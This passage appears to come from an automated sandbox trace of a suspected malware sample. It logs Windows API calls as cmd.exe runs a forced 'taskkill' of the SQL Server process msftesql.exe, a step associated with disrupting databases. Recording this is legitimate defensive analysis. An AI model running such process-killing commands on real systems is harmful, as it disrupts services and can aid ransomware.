entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 450 start_va = 0x980000 end_va = 0xcb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 11 os_tid = 0x12c8 [0125.509] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0125.509] __set_app_type (_Type=0x1) [0125.509] __p__fmode () returned 0x74974d6c [0125.509] __p__commode () returned 0x74975b1c [0125.509] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0125.510] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0125.526] GetCurrentThreadId () returned 0x12c8 [0125.526] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12c8) returned 0x78 [0125.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0125.526] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0125.527] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.553] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0125.554] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0125.554] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0125.554] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0125.554] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0125.554] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0125.554] GetConsoleOutputCP () returned 0x1b5 [0125.557] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0125.558] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0125.558] _get_osfhandle (_FileHandle=1) returned 0x140 [0125.558] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0125.558] _get_osfhandle (_FileHandle=1) returned 0x140 [0125.558] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0125.558] _get_osfhandle (_FileHandle=0) returned 0x13c [0125.558] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0125.558] GetEnvironmentStringsW () returned 0x697fe8* [0125.558] GetProcessHeap () returned 0x690000 [0125.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa1a) returned 0x698a10 [0125.559] FreeEnvironmentStringsA (penv="A") returned 1 [0125.559] GetProcessHeap () returned 0x690000 [0125.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x697e68 [0125.559] GetEnvironmentStringsW () returned 0x697fe8* [0125.559] GetProcessHeap () returned 0x690000 [0125.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa1a) returned 0x699438 [0125.559] FreeEnvironmentStringsA (penv="A") returned 1 [0125.559] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0125.559] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0125.559] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.559] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0125.559] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0125.560] RegCloseKey (hKey=0x88) returned 0x0 [0125.560] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0125.560] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0125.560] RegCloseKey (hKey=0x88) returned 0x0 [0125.560] time (in: timer=0x0 | out: timer=0x0) returned 0x623441ec [0125.561] srand (_Seed=0x623441ec) [0125.561] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im msftesql.exe \"" [0125.561] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im msftesql.exe \"" [0125.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0125.566] GetProcessHeap () returned 0x690000 [0125.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x696f98 [0125.566] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x696fa0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0125.567] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0125.567] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0125.567] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.567] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0125.567] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0125.567] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0125.567] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0125.567] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0125.568] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0125.568] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0125.568] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0125.568] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0125.568] GetProcessHeap () returned 0x690000 [0125.569] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x698a10) returned 1 [0125.569] GetEnvironmentStringsW () returned 0x697fe8* [0125.569] GetProcessHeap () returned 0x690000 [0125.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa32) returned 0x69a8a0 [0125.570] FreeEnvironmentStringsA (penv="A") returned 1 [0125.570] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0125.570] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.570] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0125.570] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0125.570] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0125.570] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0125.570] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0125.570] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0125.570] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0125.570] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0125.570] GetProcessHeap () returned 0x690000 [0125.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x44) returned 0x6971b0 [0125.570] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0125.571] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0125.571] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0125.571] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x697200 [0125.571] FindClose (in: hFindFile=0x697200 | out: hFindFile=0x697200) returned 1 [0125.572] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x697200 [0125.573] FindClose (in: hFindFile=0x697200 | out: hFindFile=0x697200) returned 1 [0125.573] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0125.573] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x697200 [0125.573] FindClose (in: hFindFile=0x697200 | out: hFindFile=0x697200) returned 1 [0125.573] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0125.573] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0125.573] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0125.573] GetProcessHeap () returned 0x690000 [0125.574] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69a8a0) returned 1 [0125.574] GetEnvironmentStringsW () returned 0x697fe8* [0125.574] GetProcessHeap () returned 0x690000 [0125.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa76) returned 0x699e60 [0125.574] FreeEnvironmentStringsA (penv="=") returned 1 [0125.574] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0125.574] GetProcessHeap () returned 0x690000 [0125.574] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6971b0) returned 1 [0125.575] GetProcessHeap () returned 0x690000 [0125.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x69bd60 [0125.575] GetProcessHeap () returned 0x690000 [0125.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4c) returned 0x6971b0 [0125.575] GetProcessHeap () returned 0x690000 [0125.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x69fd78 [0125.576] GetProcessHeap () returned 0x690000 [0125.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6a3d88 [0125.578] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0125.578] GetProcessHeap () returned 0x690000 [0125.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x69a8e0 [0125.578] SetErrorMode (uMode=0x0) returned 0x8003 [0125.578] SetErrorMode (uMode=0x1) returned 0x0 [0125.579] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x69a8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0125.579] SetErrorMode (uMode=0x8003) returned 0x1 [0125.579] GetProcessHeap () returned 0x690000 [0125.579] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a8e0, Size=0x7e) returned 0x69a8e0 [0125.579] GetProcessHeap () returned 0x690000 [0125.579] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a8e0) returned 0x7e [0125.579] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0125.579] GetProcessHeap () returned 0x690000 [0125.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x62) returned 0x697208 [0125.579] GetProcessHeap () returned 0x690000 [0125.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb8) returned 0x69a968 [0125.580] GetProcessHeap () returned 0x690000 [0125.580] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a968, Size=0x62) returned 0x69a968 [0125.580] GetProcessHeap () returned 0x690000 [0125.580] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a968) returned 0x62 [0125.580] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0125.580] GetProcessHeap () returned 0x690000 [0125.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x69a9d8 [0125.585] GetProcessHeap () returned 0x690000 [0125.585] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a9d8, Size=0x76) returned 0x69a9d8 [0125.585] GetProcessHeap () returned 0x690000 [0125.585] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a9d8) returned 0x76 [0125.585] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.586] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im msftesql.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0125.586] GetLastError () returned 0x3 [0125.586] GetProcessHeap () returned 0x690000 [0125.587] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69fd78) returned 1 [0125.587] GetProcessHeap () returned 0x690000 [0125.588] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6a3d88) returned 1 [0125.588] GetProcessHeap () returned 0x690000 [0125.588] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69bd60) returned 1 [0125.588] GetConsoleOutputCP () returned 0x1b5 [0125.593] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0125.593] GetUserDefaultLCID () returned 0x409 [0125.593] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0125.594] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0125.594] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0125.596] GetProcessHeap () returned 0x690000 [0125.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x69aaa0 [0125.597] GetConsoleTitleW (in: lpConsoleTitle=0x69aaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0125.600] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0125.600] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0125.600] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0125.600] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0125.600] GetProcessHeap () returned 0x690000 [0125.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x69bd60 [0125.601] GetProcessHeap () returned 0x690000 [0125.601] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69bd60) returned 1 [0125.602] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0125.602] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0125.602] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0125.602] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0125.602] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0125.602] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0125.602] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0125.602] GetProcessHeap () returned 0x690000 [0125.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x69acb8 [0125.602] GetProcessHeap () returned 0x690000 [0125.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x697278 [0125.603] GetProcessHeap () returned 0x690000 [0125.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x34) returned 0x69ad18 [0125.604] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0125.610] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0125.610] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0125.610] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0125.610] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0125.610] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0125.611] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0125.611] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0125.611] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0125.611] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0125.611] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0125.611] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0125.611] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0125.611] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0125.611] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0125.611] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0125.611] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0125.611] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0125.611] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0125.611] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0125.611] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0125.611] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0125.611] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0125.611] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0125.611] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0125.611] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0125.611] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0125.611] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0125.611] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0125.612] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0125.612] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0125.612] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0125.612] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0125.612] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0125.612] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0125.612] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0125.612] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0125.612] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0125.612] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0125.612] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0125.612] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0125.612] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0125.612] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0125.612] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0125.612] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0125.612] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0125.612] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0125.612] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0125.612] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0125.612] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0125.612] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0125.612] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0125.612] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0125.613] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0125.613] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0125.613] _wcsicmp 